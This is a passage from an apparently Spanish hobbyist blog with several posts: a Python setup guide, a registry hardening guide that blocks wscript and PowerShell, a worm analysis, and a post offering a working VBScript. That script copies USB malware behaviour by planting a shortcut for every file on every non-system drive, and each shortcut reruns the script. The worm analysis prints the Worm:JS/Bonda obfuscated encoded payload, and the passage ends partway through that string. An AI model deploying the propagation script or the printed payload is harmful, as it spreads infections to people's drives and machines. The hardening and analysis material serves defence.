    c = c + (str(int(code[x:x+2],16))) + "--" # obtiene el valor ascii de cada bit y lo concatena en la variable c, junto con los guiones
archivo = open('C:/Users/Flamer/Desktop/coder.txt','w') # crea el archivo coder.txt
archivo.write(c) # escribe el contenido de la variable c en el archivo coder.txt
archivo.close # cierra el archivo 
print ("terminamos") # mensaje de fin


Ahora después pasamos a aguardar el código, yo lo aguarde con el nombre de "Leer_code.py" y al ejecutarlo me crea el archivo "coder.txt" con el siguiente contenido




bueno saludos Flamer y eso es todo


sábado, 19 de noviembre de 2016

Instalando Python 3 y Configurarlo con Notepad++

Hoy les enseñare como descargar python 3 para windows e instalarlo manualmente en nuestro sistema.

bueno para empezar primero lo descargaremos desde su pagina oficial desde aquí.

https://www.python.org/downloads/windows/




como verán hay dos versiones de python la 2 y 3, nosotros elegiremos la 3

y descargamos la ultima versión de python 3, pero sera la versión zip por comodidad la cual es esta



ya que hemos descargado el archivo zip, lo descomprimimos y pegamos el contenido en la unidad c:\
así como en la imagen




ahora debemos tener el notepad++ si no lo tienen pueden bajarlo desde aquí:

https://notepad-plus-plus.org/

NOTA: No voy a explicar como instalarlo.


después de esto abriremos el notepad++ y teclearemos el siguiente código:

print ("Hola mundo")


después lo aguardamos con el formato .py así:




para ejecutarlo daremos clic en la pestaña ejecutar y luego en iniciar:




y nos aparecerá el siguiente cuadro



aquí daremos clic al botón señalado en la imagen y buscaremos la ruta de la carpeta de python y elegiremos el archivo python.exe así:



damos clic en abrir y a la ruta del archivo le agregaremos la siguiente linea


-i "$(FULL_CURRENT_PATH)"


quedando así


C:\python-3.6.0\python.exe -i "$(FULL_CURRENT_PATH)"


después daremos clic en guardar así



 aquí ustedes configuran las teclas según su gusto y por ultimo dan clic en OK

y se mostrara así



y si ejecutamos el programa nos muestra el "Hola mundo"










bueno creo que eso es todo espero que a alguien le sirva saludos Flamer



jueves, 8 de septiembre de 2016

Como Protegernos De los Ransomware Virus VBScript y Javascript

Ahora le enseñare como evitar ser victima de los ransomware y virus que se ejecutan con las extensiones VBS y JS, para eso evitaremos que se ejecute el archivo Wscript.exe que es un archivo que trae incorporado windows por defecto pero que muchas personas no lo necesitan, así que sino lo necesitan pues lo bloqueamos.

para eso primero presionamos la tecla Windows+r y tecleamos regedit para luego dar clic en aceptar





de nuevo damos clic en aceptar para otorgar permisos de administrador y nos parecerá lo siguiente




como verán tiene una apariencia ramificada,estas ramas se llaman claves del registro y nos iremos ala clave llamada   HKEY_LOCAL_MACHINE y se mostrara así



si observan se expandio ahora nos iremos ala clave llamada SOFTWARE y se expandirá de nuevo y después a Microsoft luego a Windows Script Host y por ultimo a Settings

ya que estemos hay crearemos un nuevo valor llamado Enabled dando clic derecho y nuevo valor de cadena



ahora que ya lo hemos creado y puesto el nombre Enabled, daremos doble clic en el y le pondremos como valor el 0 y por ultimo damos aceptar



para que se efectúen los cambios no es necesario reiniciar la maquina, si intentan ejecutar un archivo con la extencion VBS o JS les mostrara el siguiente mensaje




primer objetivo hecho pero queda otro bloquear el powershell ya que un compañero del foro demostró que se puede descargar un archivo .EXE desde Internet y ejecutarlo.

y por otra parte no sirve de nada ejecutar estas lineas en el símbolo del sistema como administrador

powershell Set-ExecutionPolicy Restricted

ya que solo restringen los script PS1 de powershell, pero como dice en la pagina de microsoft que se puede usar en modo interactivo leerlo aqui: https://technet.microsoft.com/en-us/library/ee176961.aspx


bueno así que para bloquear este archivo nos iremos ala siguiente ruta del registro

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies

ya que estamos aquí crearemos una nueva clave de registro llamada Explorer y si la tienen es mejor no es necesario crearla.

ahora crearemos un nuevo valor REG_DWORD así






y lo llamaremos DisallowRun ahora daremos doble clic en el y como valor le pondremos el 1



y damos aceptar.

después crearemos una clave llamada DisallowRun 





para luego que darnos así




dentro de ella crearemos 2  nuevo valores de cadena




al primero lo llamaremos 1 y al segundo 2



ahora al 1 le daremos doble clic y pondremos como valor powershell.exe y damos aceptar


con el 2 hacen lo mismo pero en ves de powershell.exe le ponen wscript.exe esto es por si las dudas jajaja.

después de esto borraremos el powershell de los valores del sistema por que si reiniciamos la maquina desde el símbolo del sistema se sigue ejecutando este programa, así que cerramos el registro y nos dirigimos a

después en configuraciones avanzadas del sistema





después aquí damos clic en variables de entorno



ahora elegimos path  y damos en editar




en la siguiente ventana elegimos la ruta del powershell y damos en modificar, no la eliminaremos ya que si en dado caso la llegaran a ocupar solo revierten los cambios




como modificación yo le agregue 0000 y me quedo así



ahora daremos clic en aceptar en todo y reiniciamos nuestra pc para que surjan los cambios del registro y después de esto no se ejecutara el powershell ni mucho menos los archivos VBS y JS


bueno amigos eso es todo saludos Flamer

miércoles, 7 de septiembre de 2016

Metodo De Ejecucion De Un Malware En Una USB Mediante Acceso Directo

Platicando con un amigo en el foro del el hacker.net de como lograban ejecutarse los virus en la USB para lograr sus objetivos, se me ocurrió otro método casi igual pero con la diferencia de que este no usa el cmd /c para ejecutar el script sino que usa parámetros, pero primero vamos a ver como funcionan la infeccion.

los virus en la actualidad que se propagan por usb crean varios accesos directos en ellas para propagarse, pero se preguntaran ¿para que sirven estos accesos directos? pues bueno ellos modifican la parte del destino del acceso directo que es esta parte




y como destino le ponen lo siguiente ejemplo:

C:\Windows\System32\cmd.exe /c virus.vbs&notas.txt

Nota: Este es solo un ejemplo simple para compararlo después con el mio y la diferencia es que este método muestra la ventana del símbolo del sistema y  el mio no ejemplo:


C:\Windows\System32\wscript.exe  virus.vbs "notas.txt"

para que esto funcione el archivo llamado "virus.vbs" debe de leer los parámetros enviados y ejecutarlos.

bueno aquí les dejo mi código completo que hace lo que explico, por cada archivo crea un acceso directo y al ejecutalo ejecuta de nuevo el script y el archivo asociado a el.

option explicit
dim shell,n,i,u,system,dir,d,f,sf,sb,j,link,b
'on error resume next'
Set shell = createobject("wscript.shell")
Set system = CreateObject("scripting.filesystemobject")

n = wscript.scriptfullname
i = instrrev(n,"\") '"
n = mid(n,i+1,len(n)-i)
u = Shell.ExpandEnvironmentStrings("%SystemDrive%")

if WScript.Arguments.Count <> 0 then
   shell.run chr(34) & WScript.Arguments(0) & chr(34)
end if

Set dir = system.Drives

For each d  in dir
   if d.path<> u and d.IsReady then
      ciclo1(d.path)
   end if
Next

function ciclo1(ruta)
   set f = system.GetFolder(ruta)
   set sf = f.files
   
   For Each j In sf
     if j.type<> "Acceso directo" then
        Set Link = Shell.CreateShortcut(j.path & ".lnk")
        With Link
       .TargetPath = wscript.fullname
          .Arguments = " " & n & " " & chr(34) & mid(j.path,4,len(j.path)) & chr(34)
          .IconLocation = "explorer.exe, 0" 
          .Description = j.type     
          .WorkingDirectory = j.drive
          .Save       
       end with
    end if
   Next

   set b = system.GetFolder(ruta)
   Set sb = b.SubFolders
   
   For Each j In sb
      ciclo1(j.path)
   Next
end function


ahora que ya les llene la usb de archivos lnk, aquí les dejo otro script para que los borren


option explicit
dim shell,system,u,dir,d,f,sf,j,b,sb
Set shell = createobject("wscript.shell")
Set system = CreateObject("scripting.filesystemobject")

u = Shell.ExpandEnvironmentStrings("%SystemDrive%")
Set dir = system.Drives

For each d  in dir
   if d.path<> u and d.IsReady then
      ciclo1(d.path)
   end if
Next

function ciclo1(ruta)
   set f = system.GetFolder(ruta)
   set sf = f.files
   
   For Each j In sf
     if j.type = "Acceso directo" then
        j.Delete
    end if
   Next

   set b = system.GetFolder(ruta)
   Set sb = b.SubFolders
   
   For Each j In sb
      ciclo1(j.path)
   Next
end function


Nota: Me han dicho que los identificadores(las variables) deben de llevar nombres que las identifiquen, ya que tal ves mis lectores no comprendan el programa, asi que les pide otro perdón aparte de mi ortografía pero se me ase mas cómodo programar asi y no batallo en andar inventando nombres para cada variable o función, así que me disculpan en la forma de programar.

saludos Flamer y creo que eso es todo,


miércoles, 31 de agosto de 2016

Analizando El Virus Worm:JS/Bonda Que Se Propaga Por USB

Ase poco un amigo me presto su USB para pasarle unos archivos y al ponerla en mi computadora me salto el antivirus y era por que tenia varios accesos directos en ella, bueno decidí  he charle manos a la obra y busque la ubicación del virus en la memoria para ver si podía jugar un rato con el y descubrí que era un archivo .js , orale dije ya dejaron de usar el vbscript y se cambiaron a javascript jajajaja.

yo pienso que se cambiaron para hacer las cosas un poco mas difíciles y si mi fuerte no es javascript pero verde no estoy, así que decidí abrir el archivo con el notepad++ (Descargar aquí sino lo tienen: https://notepad-plus-plus.org/ ) y esto fue lo que me encontre:

var b = "08506r04B07800U03e04200g07606200503K05107s03600c01c02702H03a03D02507O04e04S05l02F01c05207f02G01101s02Q00D03s02401c06n06400r03o02Q03J08004t01a00o07n07300303505604n04P05U04l07N04k05803203M05C06C05M04907U07505i06S01M02301u02H05n06h01m02G07a04p02K01k07a04l00001104607A04506202h00803400403400L06j04602K01H06406Q04M07U06805600p03g01800f03204105T06l06G05802R01o05I06601202806d05F07P04a06506I05O04d01g03003500D05R07003001A00702t01K03I02102u04907j07904J01n02205005E05q04R03f02704m06403u00P02D03p06e04N03j00H01700n01c00000201106B04p06306l05G06A05K06i07s04k03R00B00403q03r00N05A06T01400103203n04907b07F07105q05300O02100o02b06508203401d04G07000U01S07R06S02O03k05H04407R04P06004F07307u00a01906i05104100F02901907606206705904f08007P04500U03K08204c05j04G06807G08605402J03606707h01k00K00502905F06b06n05n07m04B04000F04c05I04Q05P06L07F06A07F07I04e03B02r02403C01u01005b07b01903400802906p04402k03J02T03J02U01U01700l02503B04T06406T04A05P07o00702c01603j05q04K04g05j04002T04d05a04r07t00H01104002p03204103l01h02E00504101j02D00O06i07L04r06200j03l03702p07u07303J02p06M05U02C01505u06T02801a07704o03j00l02n02007008407t06Q07906B06807L04201000401m02m04307M06J06P04l03G01504g06907805n03104003D02304707905N04502Q03m07308301O03i02N01h00303G07906D01f00C07a06a05H04402j01h05I05104505f07e06B07N05n05607F04i06706r04A04g05j04805k06a05A06t07B00501f02N03l01O03o01t02l02n01N02H01806206l02K03q01c00903P02j06D07I03800407n06701h00R02i03l06j04D02g01802601O03400A00S02Q05606p07405p03E00T07704906505207r07603g00C04302D05904J04q05m04201g08306403C01507n05A01L00H03S02T07i06I06j07805O06o07e06S00O01k05406305407205207R05f07001702F01Q04103m00107j04907o04b01T02R03t02Q00G01s00m03q07h07507p07003k02O05T07H02301504607D06205100S02m06B05905q06707308104o05R01S00S07h06c07T04R07507M05r05207g06H07G05i00H03r06i06507K04a04606C02G01T07L04b01U02D05606A06907804j05903400003f02Q05D04708607008105K00703H04g08607804p04300a01K02K02o01R07I06H00402e05p07N05h07f01n00j05F04C07n06t05105l01J02l05Q04800201A01h00i02G00a04T07n01t02H08104m03R01t03900k00q03M04r07803K00K07G06H02H03704G07K02G03t08106O06h07J02R00F04k07402A02101902B07205e07l04f01001r05o04L05T05407L06800903B03402i01U00M06k07J01U03s02201A04807U00103D01t03R08304d06l05B08304H04T08405a04B04e05605e06E06U07j05904j03802407G06501q03u00t02K06A05105306106405103502703E02905R06T07E06S06j07D06104t03U02103201n06905l02901d07R05L05g07002C01403g00r01O02k04J05I07h06706407605305F03502B05B04501B03L02I01M04200G04k05Q06t07S05G04G01500807N04L03P02904I05A07R06S06g04I00L04007505I00u03O02K00m05307J06b05h05l06c04100O04303005P05403001T02E03r07007p06k07g03R01r06406N07N04N07I04701202K01400605005U02603604r06106l05J06707n07M06A03502203701O01B03C02700m04J06c05B07c05G06a02K01t04j08306805l04b07f05I06705a06f01102700j03401800504P06401j02l07407l06P08000201607104600p04000p03Q05I04C00K01n08407203B02604807C08206H01400800701602i00301j03K03I01T04406F00l02o03I00003e00501702K06905m04507L03R00K00m03T02j01L00703O03004307007P05d06f03003H06707h06f07L05707N00303900203902R03S06R05201102306F06305C04601F00C07906b04f05c03h00F00701N06l07b08307007504h05c07B04g07604Q07606r04q05706j04U07r03700g03J00200503d08404K04s07R02O01K04h08708407500901304l07n03Q02705804c02d03c05607905806g02K01700m03706506s04o07j01A00C06a07d00E01304L07N07O06605005L07u06R06I05406P04K01P03E01503g06d04800j04000103I04U07l04300D00B03702G01303300c01802401N02607508405804c05H06j02O03802203E05L04R06q04g05Q06M00003h03003R08607303L02n05S05005H06J01500L03302D04405707t05Q05P07203600E02L01400L03308604e07u04M01U02h06a04r04J07T00103l06t05802u01Q07105s04605507g06807C04801N00500601e01s00s06804m05108508104F03e00A05r07104g07706605A06H05C04907t06R07N03b02C04G05g07706i01q02q08706k00601e06a07a01i03400e04000L03T01S02Q04f07L03g00u07804m04905A07f06500S02m03i01b04r06b06a04503A02900P02p00u04306506o00403403702r04L05O02600703300107105f04707u02002D01802n05606a07E05902A01505007p07904B07f04a00Q03h01D00206107501603002601202k03j01500306307708606b02a01f06G05A01l02803003o04F08505c06c01R02A04303203P01006708402O03900r01106L05b03503100E03f06o08402g01303O00g02h01203m00k07A04r06L05C05t04707q04u05J04906G07804M06104k07t04e07C07L05104N06103800j01402403J00205E04D02S02107s06E06206O08305305407f07L06k02200503900800003o00E03600G03o00303K07e04A07o04908404N07g05001M00T02t01r01H00u08505T06D06503800000G03M07e05R04k07C03o00G00303K04408103t02k00H03M07004608304m03901S04002n00p01h00o01400501502i01M00201D08004T07k04t07e05703800B03U01000f01805S05304506001102707T06u05P07004m08507l04S06207002103k01C02G06c06407s04507F06604L05t08206p03701K03B01s00603800T03i08104K07D04q07e04N04u05p06306I05Q06601802G00H03802C03503M02S08104807G04E04s08102D02105H06L05U06n01H00o05d06J02503D04E07o02502006A05U04T05L04r06502t03S01S03b06S04n07805I07D05806008102B00T00k01L05A04j04K05L05K07G00e02U02003k03t01O07806704806P08004l01902803h03005T04E07104900f01e03J02u05U05307108204K06d06D04J04101p06p04500502206u08005P08206E05E07804G06j05d03f02E06f04904G06B06g04502i00l02O03p02a03D02M03K06607E04h05600K01K04U06003701K01j03T03000o07J06402700003802702P00Q08705302J02104r07902A01f00P03R00003600q03H00503j01d03103L00n04I08401700601903706h04604b06i05807d05s04R03302403O02I01f00900601b06R07P00t01u05o07b03G01608505t05k08505B07A04S05T00f02404l08601k02P07B04504H07805A04905r08200d02606507r01f03e04705801f00C02f03b04h05F02q03K06N07h00003p01N02p07n04604t05u08005C05m04G04S07A07m04T07n06G07H06E04H06505o04607R06b04505800M01r03c00804s05705l04M05d04E05d04803600N06404807i06f01U00c07207M03103F01F00o03302p01g00M06304d03p02305t04g06R07707D06a01s02805904c01I02I00k01a02E01304300Q04907P06807907305206q05S07P04a06406T06f06502F01901j03D00602b06K05H07f04605g06k00l03P08204i04p06306607906M05C03900l05008002401h02102o07s04903800H01m00R05t06H07P04U00903F04t07s06n06305A04B06k07e05O05402801505705402D01604T08401A03103H02g01803906h05d04J08304507F00103q00K03K01g03Q03u01L01n02M03n00U01D02b01G02e01s02H04C05507n06O00j03307606207M05204M08302q01907e04N06n05t06705K00T03T03P02Q05Q06p03j00P00i04205F06L00B03r05Q06I02701n02N01205i06E03M00u07U04s02q01R08704P05d06j07k04i06D05O01l00m07P07201G00307605s04k05i00503600603m01602D01t03207M05005S07503q00o01602D03K02R02r03J03800u00003L04f07L04u07L05307i06f06102C01501500c05h04803L02504i05A07q06405t07000603l01502e05804H08304D02801808604K01502206006R04t07r05105p00901103T02l03802H06F08703103E05j05003E02q07H07306C06008306h07a06g04a05D06905S07g04a05306J05L06a03R00A03s00G00703C05k06e06807h07h07201400l03103q02D03802G01u03l00706d05A03400i04J08301C02R02S01k01102g06k05e00r01K04f06003f02707t04f06004Q05008703d02p00003404D05c03E00e04d07e00303O06106O04707o07g04A02K01t06t06000L03j03P00O05906M06l07e03204104200E05107l02f01302401204j07H00F04001802m00r01q00f01705g04b04p07q02O03e03q00j05604d02A03D01003D04T07h03Q00i00B03S06206o07d04b01202E05606A01g00d05604C02l04300p04205205501c02h02f03802100T01u03101S02M01e02200f04302d02006E06205R06P00503Q04H07A01R02t00603e01c02g02f03i07307s04O05T05D07104P07707U06g01U02l06T05n01602k04405501o03p00303302U01905407T05d07505h06f00t02700B02604807d06K05908504s02601802P01408706t06c07b04807U01802H05706D02102l06S06001S00l05806807605K06406k07n05107D04j08204T04l07n01N02404607i08704K06T05u03c02d04L05t04705k02801B07K04606e07s01m03h01m03b05Q04T03300607C04K06i06207A07501g03N07l05O00101E03201s03c00604G07F03f02j07I06f06004S01k01000103802901906j05U03e02O02S03D04c05904i07D02701406J07N08105405b06P03o00r02401206206e07704d07c04E00f03405T04k04300Q01o00u00L03H08304j05506O07c05105M06G05j06u07c04803H00S04605703C00T00101t03800703e02704m07S01p03007205k07304u01c02606506P07m04f04A07a06q05B04i05B03300502903H00k01G08304J08606m05606607505F04U07l03001G02i01Q05806706406H03J00408404T01402I00t01100901S00G03G02102U01302506C05n01J02J06f05602c03504607J06i07C02G01M00a03Q05P06F07U07203h00t05I06K03q02c01c02f01C03103o00r03g00E04000803300902K01U01g02307906g03f00903f02701003702102S02F03905205507h06e07706807607b00D03u03O00k07R04a08507403O00102O03E01400j02503r02L01m04407M07b04q01d00402h01q04907b00g03503n02M05107p02P03D03H03100K01g06805H00l01a02U01q07307p07904i07T04N01N02Q02a01g01G02t03M00r01900j05U06t00R01H05n04t05205P02701i01P00507M06D07505f00701S04e05r03o02200m02107407N02j01604E05601102701Q00N03I00C06H05801702906h05u04J06i07M04406l05g02002t02N00K03j00405704e00U03J00901105N05301K02903Q02J00a01o04c08405T04702H01u05606a02R01e00d03r00903U00003h04r05S01703e07P04N01E02R06u05l04905g00403801n02M04507P01N00u02n01202S03M05S06G02i04007704C05J06l01R00705308004U07m06H05a01402201M02305Q07302l01T05F06A01J00q03800007207p07G04m00A04000003401p02C06e07F04507S05305806104t04605501500804707k05j04N02M01803g00E01g00704R07p05704f05p04J05C06708504m07S04B04T05M02301O05E06E04407p01l00K03P00404e05s00u01F02000507205E08406607O04603C00A01300A00f03d06s08704f05j01N00304F05504705r06h07N02801l07S07506Q08700I01S06506N05R04F05U06G07o04m01M00T01702K03I02601s02N01K00q00q01n00T03C01l01006P07l06H04s02j01607C04R01H02r06f05c06b05702C03703N00i06m05704100i03r00L00102405606f03A00600403P07B05C03C00606R05m00S03S05u04L00i04001F00b05205k08306K03U02i01U00407507g05K04a02N03h03U00900g03O03L00602T01F04200C00e03307T06s07205k05u06a06a07F01c02j05H06s04l08605e04o08105403k00403700a01502904200A06r06205k06607s05000h01q07C06I01h02D04200804100s01U02h06O07P06T05806g06404G08301600o05306b00801b02f01602J01603N00005906q04u07g06P07G00a01607m06604K07E06k05U01903206b07I05e06a06k05c04P07t07q04500703B07904L06R06002l01m05d07307j06801j02J02501D07005P07107s06F07I05105l01g00d06U05l05j07102901K05A06R05D07201U00704K06507i06A02S01e00804307205H06E07D05t07607u04s06a05G07804A07904I02b01D06707M02501104c07e02B01506O08504C05f02s03p00b01a01o03201003e03300K04300f00A03s08706B06B07H04705h07k04u05n06B06905p03N02s07F04e04c07805S07002I01O07d06E07205T05506l00u03m00g02104303008505500l01f00r04107f04B01202L02k03T02901I05D06f06S05905L04K02U01m04805u04k05504605J00M04205b04E01D02t04000P01102I01c00g00q03m07d07104907O01Q02F03900H04R05U03C00504807802501e01302702C02005a06j02h03n06R06204202n07j06D01001N07P04A07A04l05707203F00n05L06c07r04p06B05s02N03O03u00J04002306506N02A01e07C04M06707807705600F03F05B06O04B07L00804207G04g05h07r00G03206U06002L01Q08305307B04b07005i03L02S08607301P03O06804l01s03602D00601203G02a03t07A06j02J00202M01I01H02403600L00m03m03400j00R02502a00505t07R05h07B01703L04n06d04606o07607o03802l07f06c03402j01g00d01A00006h07n08504P04405j01602C00203L02801405n07308506R00801b00e02B00a02h05807U03c02d05I04502G01R00L03404607S00M02f06J05905b08303e02405a04D00603h01800901902T01r03201A03003j01306q05M00q03E02O01406a05603m00005a06N05907j00M03m04O07s05h06e01E02a02k01101R00I06004S02400n01f03004300q01102k04m06502g00F08005400103703800b04Q07906l07K02N03S06F07I00402b05s06U01K02B00203E07D04E06u05P07l04J00401C04405Q02g03301800N00801904202O04c07600o03K00O03p04p07O03900908104I01T02H00401505j07702S00E00K01L02B04303003M00c02102S03402203307j05t02102F06605E07s04L07q04Q03U00L03B00s03802c04N05903c02901h00002000504203102S01901e02T00402005g04u07706n00U01H04o05903p03205504405906e02O02107b04J04t08405406502700202r01t02401200903504u07s02e03h01300b05G04b03g00500F01206M05801M02I05m06b05t07H01M02i06106G01t02B00s03S02o01608404C02t00J04n07T07005t06P05s01K02O02C01p05d04405S04p04F06e00T04001n02N05706g07305u02T03P03I01d06705J04F07c02E01P02901M04907h01m02r08206U00m01R01t00U05i06907B04f06B07F03H00D03800403g00E08504p04100o01800503A02G08406m01K02T05e04B01402i04o07o01S02H05406J01402803B00P07q04a06u06301n02702201l07H05700O04100b03d07f04G05o06S01I02507m06D06t07S02O00601102k06507503N00j01r02p04H07J04F05e02503i06M07p04t07u02i02103302F00t04207L04J02u02105A06j01p03005904A06l07d06L07A01C02500201d03e00O04407c07405e06m04600n03l07o04405o06C02u01Q00503p05T06I06904f01I02M04507704A07901502308304D03t02k00h01K06804508604l07M04504L08702601205806605T06I00n04201a02807405O02203505a04d08507600p03T00303i07D04d04I08504807801c00907h06901N00q07F04406404K06R05b05M06Q01003k07K04d02000M07008308107203302B02i04000Q03G05j06h00b03U05O04i05804F01702A03B00D05A06O07208301l03J01u02u05J07104j07h07a06h00B03606c07f06h05H00803G06U05h04a06D04507K02i01t02103G05c06807405J04A07t05s06u06d05e05706N02901303h01702t02004j07l06b05605D06J00B03S04t07H07Q07203802E06h07C01p02D06u05d06P06503201N00703m00b01401t00u03701107O04K06406g04607e02904101800703Q02N03C02205005q01S02d03p00p01G03201m00T00l01T05g04901g02U02s01B02d01802501B06m05901q00h01800505H07n04t07u03M02j05l04T04S05R07r04B03800D05l07006905A02R01e02403D02R03J01t00l06707f02o03R00D03d02f01902r01E07905R01C02407704h05r06p02o04201r00J00001g04t05D03101S03c02S03P02F01502f01q03200L01U03o02604705L07l06S06908300201o06t07b07806R07g07401200h00F02103L02g02I01802F01905R06C06104m01302i04l07r01T02a07d04N07q04503l00s01i00H07904p01A02e06G06005i06M06B05b03900703d00U03900501e02702C03506p05R01M00S01703004N07L03L00002o01K05T06I03a00I00003L03n00q00o01Q05G04u05207707E06h04i07I06106r03300K02404301I02P02701H08604k04j07j00804001302D06O06302E01303T02k06407202G01908104R00n02005907606D05o07L05105s06k06l05P05j06l05P04u05P06C01o02407205Q01900008307305o04q05D06H05C06e00603e04n07701O02905c06803m00g08506U04J05k05704H02201402F03G06p05l00N03P01B02b05Q07004200d05C04b05005U07d06700801407904b00j03o05207q00a01200R01t00n01M07t06S00J01t02800i02e03f01800805407107u06T06D07F03801306004U05H08104d08201g02c07s04B03g00u04H05S03k01O05P04o01g00002k00h04905705g04b08206g02a03704E05g03402j07n07007A05300G03m03Q00m05c06P01b02b01R02K06j07C06p05R03m02s06106607Q04I02002506l07a02301A02g01T07a07500l03m05R06904M08402b01b04J08308004L02701B03600d00r01K06t05n08606t07J04R01L03002H01a02R03K04T08405q05107o04B05M06M04O07D08207106805r05505200501L02S03P02701c02C03Q03b02r03i02M06N05P02T01O05P06D00t03R00k01L04B07O00l03N05S06b01T00s07S04506a08108406k03o02R08704l00H01D05N04601Q00203001a03G01007q04e04608103700502C03707405k06D05708604T03K01706206K03R00h00b04302901307L06C04P05s05707h03O02005K07j04d07307l05N07L05n05G08002T01l06j05G05O06d08204H03001T04A07r03O00g03602102300t03501g05806G03O00M02901M02201G05r06b05S06u05j06e05407I08205B04a07101t03e05506F06k05502901407305o05D07604000f06I04k06J04L04506808504C05p06c01003G01m02I01U02L07505f00I02600603604S07H00I03408304M07205P00M03R04o06E06507A03R01U06u05507305H02701A01a02807S04b07N04p04100f03u01807b05T04606903500606406e01j02l07T04S07G04E05u07301r03105908003k01e08205N06G05800l03k03L00m07F04h06306P04E05D03G02302102d02U03j00701607204d02n00G04P06O07J05o00j02p00E02r00702a01M03a06a04401400100301b08204B05F06F01004202M01101o02M01k02t02p04302102f05504d02c01I04h07n04j08301m02900404105q06k04l07n04L06503b00q00403404707B07R05800003l07605R01302o05H06F01800f06305403s01I07204k07a05500902u02600O01m03C04c07202P01p06u06402401N06605s03D00b05N06604G07G05C08307e06104001i00H03r07G04E02I01302q01o06t05907J04703t00s01t02a05f07t04J06p06F05305e06604h07A02R01u05307o00403M05i07500H02F06T04f00402903001905R06A03n00601r03200i04003800h03p01100303904300d05d07208604R07g04A00B03807D06007906402h00a02802005F07102002K02t01L07605I04o07O04A07r06i04k03M01g05c07d03300403u00d02N01L08604K01n02n01p03001H02m00702T07706204606n00503g05N07402201O01A03t06J05T06506l03800003f00U06704D06t06402E01905806D08404T00L03u07008303E02900203f07307n08206u06F05004m06T05007307U05d02H00B01R03G05M08601r03B04A06803u02R00C01607L04N05906d03600206406G01302306p06105n04u01h02407q07102Q01404100004200306D07I07F04u00t04207107e04B07805407H05u06T07105u07P04A06c05K08204P02301G04M06003b00302a01E02s01407G06b07r04B01t02a01B02Q03a02g01H02D02N01407o04K03n00605206305606o07307806007804i06P06E07b05b06i02I03G02K03505405o01n02G03402f08104f03G00805506p00701r06205301200306L07R06D05603101i03D00o02G03906K05t00103306i06401700606b05h07607905C04R04c05o06F05502n03c05B04O05p04500a01T02503r01502F04505F07n07201900104e08103M01907c04g02U00106708405J06d05905404t08706q06101k02300O01h06006P04u05c07007G00F01l00F03906I07n06o07704102A05M04b05K04o04507f07207n00301902503d02901e05205505405S05n06U02p04006g05u04e06n06J05900o02708006P06G05603c00C00A03m04j05605G06E07305p05o06O07l05100o02T06q06105q06N05c06807h05G06c05N01400B02S01k03602805407r02801400N03H03J03101U02J03d00f03r00M02f01b08704f05C06l06R08400P01h01h00l08506L07b06n00K01303h02400a03L06S07i04807U01002607l04B00E02L06P08701b02R02G00l06805g02o00b00t01105I07500902k04300l03200207k06700003m00f02m06006m06q04d02504201502u03502R00J03T05M04G03103H03902c01l03105H04l06204g07I06M00Q04007I04803A00L01d00405606T03N00l01d03106I07J05u06602m03c01u00D05905406B06200U01306N05700904107B04q06u07t01302G02701100R03o06J05f00d03S04B07m00D01n04L07F00I01q06404P02I03s05k06C02q03807507t01402C02j03T06h08200801205Q04k03D02q01s00e03902I07L06803P00s06j07N02O04202n02105u04m04J08404I06R07704D00N02c07307s07208606c07r02s03I07207K00701c01G02P00Q01805O06604e06N04b07l03U01707I06d02C01q08205605g06800702s00C01I03c00Q01J03c07f04604407405e04900103l00702u05K06B02q00503802Q07904u05704i06N05807S04K08704g05O04s06808701A03T05s06901502O06E05607H04802H01906404K06J05g05207m05b06F01202e07O05N02E01500s04106506j06k04h04k08706K05F03P00j02S03l03N00705H06U00503Q02g03300G03M03G00503500303K00306O04L07R05003900203h00B00u03201E02R04905I05207b05D04503601u08404j01B03k01f00605K07303r01402501B00402r07207n06H05T00202R07o05004l06I07c06I04b05704Q05903P02501m00302700O03302b01U00603C00R06407206S05703e00U04p07E03I00102Q03R07D04o04707d04D08205K06o02r03o00803E05r07001h02k05n04J03500407505G07L04407506303K00503l00R07D04d06206o04q06400701F03G00M05O06701402801C03206306e00g03502n01S02c03d06J04402501300o03F04L08104T05S01L02K05407q07c04E05C06E01d03102d03601J00q07607l02503b04f06c00f03H02J01605906I05904E07305j08705301802b05T07307105Q03900b00A01301u00K08206p05K04903902i00B02001H00502303l05105F06s08700401B04D08505207P07e05p05N06c01402j03K00O04j07802q02105d04404t05D04s05J04G05A02s03N02c01q01202m03K00J07O04602601h06006E07E04I01u02L06007402c03507g06U00401E07405507p07506H05501102d07707408306G03802B05q06L00S04203300F00T01106J04Q06p07O00i03303L00n08604t03D00f06u06203A00e01t02a01j00G00D01207G06h01n02304707H01o02r07N04O05C06e06i06100u03G06u07S01O02U01F02E05P04q04f05C00B01a00d03304707o04h08108507601e00101p00q00403p04507p00F03U08704H08604F07A04e03B02c05r04u07n06O01N02T06e06108505307q05106E05B04l07U02Q01I00903h04l05o05o05402803703300G04t07I04O08306Q05s03J00l01402T07005e01E00F00n01S04c05F02D01B06D05M08505106s05A02C02000A01900s01h05G04d05806803n00204707b02U04204H05605804502a01607h04t06t05N05r04O03402F03j02k04D08101A03002M01U04U07r03900L01802L01F02H06o06400e03505E04f02603b05j04g02h01t03400502L01J00803u02D01F00m03503K00404407n02903806b07g02f03I03i00600p03d07E04O08205403c00t03001905107j02F03I00d01203e02B06h05I03800M03G03201H00002603901i00T02303605107o07b04a04l07N02201E05e04F00e01304F05e06n05U07I04807205j07005F04g07g07r04r03r00p05107N03H00204G05j06204k01U01006406S00k04107C04J04t08005906d02p01T03t00e02g01702m01u00703n03402504g05502603906106F07b04l07o04n01r02n06D05o02B01U03E00e02U01p06F07i04P05u00001307904705c06o03900I07G04A07p04406t05706E05B01502p00201100p01M03L02i04A07e00403l01r03203600D06T05L05m06Q01302I03m02j00M01r01P00Q04807905C06k00303i07Q04q03400C00h04205506k07108000k01P06O07N00S03U03a00a03900303J00205E04F04e05b04e05D04f07A05E06c05f07502K01l06a05i01a02J05r04o04Q06001400100303b03a00b01502L06e05800701600Q01N02L03K08004P05J06i00E04103O00K05T04u02S03p03H02E08304F04707o01P02p07k04I04t07r04g07a02s01l06505207I06d06u08200903u05308306605C05506j07704j00C03507K06L06Q08002H03g02J01307905007704n01S02q03400d02e01A02701507c04f01001U04N06501400108604E01a02C04707q04R07805M06u04h07f05n06B01G00d05E04905J04g04100803h00007i04B06605k05I06K04000N03q00i07m05201J00g02L04307906607305g03U00i03e00P07305u02A01s02n01U01502700b03s04q08503802901g00303802902U01r04g07C02601102801306C05f02d01f07105D00L01o00Q01n04f05E06i06404707d00403q06106S04R08003t00k06A07D02T03Q07U06r07904m07m04E05107l01E02D05G06c02501d08704L03502200501a